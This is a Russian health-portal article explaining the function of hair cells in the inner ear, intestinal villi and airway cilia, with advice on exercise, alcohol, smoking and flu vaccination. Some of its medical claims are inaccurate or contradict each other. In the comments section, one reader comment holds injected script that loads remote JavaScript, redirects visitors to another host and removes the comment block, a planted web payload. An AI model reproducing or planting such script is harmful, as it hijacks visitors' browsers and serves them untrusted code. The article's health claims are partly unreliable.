Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Волосы и волоски  >>  Волосы и волоски
 
Обратная связь
 

Волосы и волоски

Размер шрифта
14 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Крошечные волоски в нашем организме: волоски в ухе, ворсинки в кишечнике, волосковые клетки в легких, для чего они, и как сохранить их здоровье?

Функция – равновесие

Вестибулярный аппарат человека устроен так: во внутреннем ухе за равновесие «отвечают» три полукружных канала. Три взаимно перпендикулярные дуги соответствуют нашему трехмерному пространству. Жидкость внутри этих полукружных канальцев двигается только в том из них, который совпадает с направлением движения человека. Поэтому человек всегда может определить даже с закрытыми глазами, как и куда он двигается.

Что убивает волосики вестибулярного аппарата?

Малоподвижный образ жизни! Вестибулярный аппарат поражается только в результате травм или воспалений внутреннего уха. Основная причина «морской болезни» - отсутствие тренировок.

Что делать?

Регулярно заниматься спортом!

Ворсинки в кишечнике (пили)

Функция – всасывание пищи.

Ворсинки в кишечнике необходимы нам для всасывания еды. Сам кишечник имеет длину 7,5 м, общая его площадь – 400 кв. м. Главная функция кишечника: переваривание пищи и всасывание воды. Кишечник имеет два отдела: толстый и тонкий. Скорость продвижения пищевого комка – 30 см в час.

Ворсинок очень много, поэтому внутренняя поверхность кишечника кажется бархатистой. Каждая ворсинка – уникальный механизм. Внутри проходят капилляры и артерии, снаружи она покрыта слоем эпителия. Кроме того, ворсинка имеет мышцы, благодаря которым она совершает ритмические движения. Так происходит всасывание веществ.

Ворсинки – один из основных органов всасывания кишечника.

Что убивает волосики кишечника?

Алкоголь. Он повреждает мембраны и содержимое клеток кишечника. Сосуды стенок кишки разрушаются, нарушается кровоснабжение ворсинок. Нарушается всасывание полезных веществ и выделение вредных.

Что делать?

Откажитесь от алкоголя!

Волосковые клетки в легких

Функция – фильтрация

Слизистая воздухоносных путей представлена особым, мерцательным, эпителием. Назван он так потому, что на его поверхности постоянно происходит движение особых клеточных выростов-ресничек. Ковер из ресничек колышется строго в направлении «выхода», создавая непрерывный поток слизи из легких и бронхов – в носоглотку. Не будь такого «эскалатора», вся защитная слизь очень быстро стекла бы в легкие, затрудняя дыхание. К тому же, слизь задерживает все мелкие частицы, попадающие внутрь с вдыхаемым воздухом, и таким образом происходит непрерывное самоочищение дыхательных путей от загрязнений.

У курящих людей эпителий лишается таких замечательных ресничек, и очищающий поток слизи отсутствует. Курильщик вынужден постоянно откашливать накапливающуюся мокроту и слизь, и кашель является постоянным признаком пагубной привычки. Частицы сажи из табачного дыма, не удаляясь со слизью, осаждаются в легких, буквальным образом засоряя дыхательную поверхность.

Что убивает волосики легких и слизистых?

Инфекция и заболевания. При таких воспалительных заболеваниях, как трахеит, бронхит, грипп, вязкость бронхиального секрета повышается, из-за чего реснички быстро «утомляются» и перестают двигаться. Это может привести к частичной смерти мерцательного эпителия.

На тех участках, где мерцательный эпителий погиб, появляются клетки, лишенные ресничек. И тогда затрудняется выведение бронхиального секрета, он застаивается, а это создает благоприятные условия для развития инфекции.

Чтобы сохранить волосковые клетки дыхательных путей здоровыми, сделайте вакцину от гриппа.

Видеосюжеты по теме:

Волосы и волосики. Экскурсия вглубь организма



 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.